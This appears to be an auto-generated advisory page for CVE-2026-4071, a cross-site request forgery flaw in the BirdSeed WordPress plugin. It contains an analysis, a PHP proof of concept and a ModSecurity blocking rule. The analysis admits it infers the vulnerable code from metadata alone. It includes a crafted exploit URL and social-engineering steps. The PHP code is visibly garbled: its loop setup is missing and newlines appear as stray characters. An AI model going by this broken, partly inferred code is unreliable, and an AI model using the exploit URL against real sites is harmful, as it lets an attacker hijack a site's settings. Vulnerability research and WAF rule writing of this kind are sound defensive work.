CVE-2026-4071: BirdSeed <= 2.2.0 Cross-Site Request Forgery via BirdSeed Token Change PoC, Patch Analysis & Rule

{
“analysis”: “Atomic Edge analysis of CVE-2026-4071 (metadata-based):nnThis vulnerability is a Cross-Site Request Forgery (CSRF) affecting the BirdSeed plugin for WordPress, version 2.2.0 and earlier. The issue resides in the birdseed_plugin_settings_page() function, which processes a ‘birdseed_token’ GET parameter and saves it via update_option() without any nonce validation. The CVSS score of 4.3 (Medium) reflects the low complexity, network-based attack vector, and limited impact of integrity-only compromise.nnThe root cause is the complete absence of nonce verification in the birdseed_plugin_settings_page() function. Based on the CWE-352 classification and the description, Atomic Edge infer that the function directly calls update_option(‘birdseed_token’, $_GET[‘birdseed_token’]) without using wp_verify_nonce(), wp_nonce_field(), or any check_admin_referer() call. This is a confirmed vulnerability from the CVE description; no source code diff is available to confirm the exact line, but the pattern is clear from the description.nnExploitation requires tricking a site administrator into clicking a crafted link. The attack vector involves sending a GET request to the WordPress admin area endpoint that triggers the birdseed_plugin_settings_page() function, with the birdseed_token parameter set to an attacker-controlled value. For example, an attacker could construct a URL like http://target.com/wp-admin/options-general.php?page=birdseed&birdseed_token=attacker_token. When an authenticated admin clicks this link, the plugin silently updates the token in the database without any CSRF protection, allowing the attacker to replace the legitimate BirdSeed token.nnRemediation requires implementing proper nonce validation in the birdseed_plugin_settings_page() function. The fix should include generating a nonce with wp_nonce_field() or wp_create_nonce() in the settings form, and verifying it with check_admin_referer() or wp_verify_nonce() before processing the birdseed_token parameter. Additionally, capabilities checking (e.g., current_user_can(‘manage_options’)) should be enforced to ensure only authorized administrators can modify plugin settings.nnThe impact of this vulnerability is limited to unauthorized modification of the BirdSeed token setting. This could allow an attacker to disrupt analytics tracking, inject malicious tracking code, or redirect data to a third-party service. There is no direct data exposure, privilege escalation, or remote code execution possible through this CSRF flaw alone. However, an attacker could leverage the compromised token to perform further attacks against the site’s visitors or backend systems.”,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-4071 – BirdSeed $exploit_url) {n echo “[*] Trying endpoint ” . ($index + 1) . “: ” . $exploit_url . PHP_EOL;n n // Step 1: Retrieve the admin nonce (if needed for initial page load)n // Note: The CSRF vulnerability means we don’t need a valid nonce to change the token.n // We simply need to trick an admin to click this link.n n // For demonstration, we simulate the forged request using cURLn $ch = curl_init();n curl_setopt_array($ch, [n CURLOPT_URL => $exploit_url,n CURLOPT_RETURNTRANSFER => true,n CURLOPT_FOLLOWLOCATION => false,n CURLOPT_SSL_VERIFYPEER => false, // For testing; remove in productionn CURLOPT_SSL_VERIFYHOST => 0, // For testing; remove in productionn CURLOPT_USERAGENT => ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36′,n CURLOPT_COOKIE => ”, // Attacker does not need cookies – the admin’s browser sends them automatically when clicking the linkn CURLOPT_HEADER => true,n ]);n n $response = curl_exec($ch);n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);n curl_close($ch);n n if ($response === false) {n echo “[!] Error sending request” . PHP_EOL;n continue;n }n n // Since we are simulating the victim’s browser, we don’t actually have cookies.n // The real attack relies on the admin being logged in and following the link.n // This PoC demonstrates the endpoint and parameter that the attacker would craft.n echo “[*] HTTP response code: ” . $http_code . PHP_EOL;n n // If we get a 200 or 302, the request was processed (though actual token change requires authentication)n if ($http_code == 200 || $http_code == 302) {n echo “[+] Exploit URL works – the admin’s browser will process this request.” . PHP_EOL;n echo “[+] The attacker would send this link to an authenticated admin:” . PHP_EOL;n echo ” ” . $exploit_url . PHP_EOL;n echo PHP_EOL;n break;n } else {n echo “[-] Endpoint returned HTTP ” . $http_code . ” – may not be correct.” . PHP_EOL;n }n}nnecho PHP_EOL;necho “[*] Attack Scenario:” . PHP_EOL;necho “1. Attacker crafts the exploit URL with a malicious token.” . PHP_EOL;necho “2. Attacker sends the link to a logged-in WordPress admin (via email, social engineering, etc.).” . PHP_EOL;necho “3. Admin clicks the link while authenticated.” . PHP_EOL;necho “4. The plugin saves the attacker’s token to the database without nonce verification.” . PHP_EOL;necho “5. Attacker now controls the BirdSeed token, potentially hijacking analytics.” . PHP_EOL;n”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-4071 (metadata-based)n# Block CSRF exploitation of BirdSeed token change via forged GET requests to admin settings pagenSecRule REQUEST_METHOD “@streq GET” \n “id:20264071,phase:2,deny,status:403,chain,msg:’CVE-2026-4071 – BirdSeed CSRF Token Change via admin page’,severity:’CRITICAL’,tag:’CVE-2026-4071′,tag:’wordpress’,tag:’csrf'”n SecRule REQUEST_URI “@rx ^/wp-admin/(?:options-general|admin)\.php” “chain”n SecRule ARGS:birdseed_token “@rx ^[a-zA-Z0-9_\-]+$” “t:none”n”